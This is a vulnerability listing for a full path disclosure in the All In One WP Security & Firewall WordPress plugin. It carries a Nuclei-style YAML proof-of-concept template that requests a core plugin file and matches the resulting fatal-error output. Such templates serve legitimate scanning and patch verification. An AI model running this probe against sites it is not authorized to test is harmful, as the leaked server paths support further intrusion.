wp-all-in-one-wp-security-and-firewall-fpd: All In One WP Security & Firewall - Full Path Disclosure

2026-01-08 All In One WP Security & Firewall PoC Public

Description

All In One WP Security & Firewall WordPress plugin contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.

PoC

id: wp-all-in-one-wp-security-and-firewall-fpd

info:
  name: All In One WP Security & Firewall - Full Path Disclosure
  author: theamanrawat
  severity: low
  description: |
    All In One WP Security & Firewall WordPress plugin contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.
  impact: |
    Attackers can obtain server file paths, aiding in further exploitation of the website.
  reference:
    - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
  metadata:
    verified: true
    max-requests: 1
    public-www: "/wp-content/plugins/all-in-one-wp-security-and-firewall/"
  tags: debug,wordpress,wp,wp-plugin,all-in-one-wp-security-and-firewall,fpd,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Fatal error", "undefined function", "all-in-one-wp-security-and-firewall")'
        condition: and
# digest: 4a0a00473045022100e4ec57ca43ef2b1706c630df6bbdaf726b2cb3e7091785a8833aff68a4b7e4cc022001e3880053e1cfa44284226066035c1bb936e8a7298386d012f418bc99765839:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities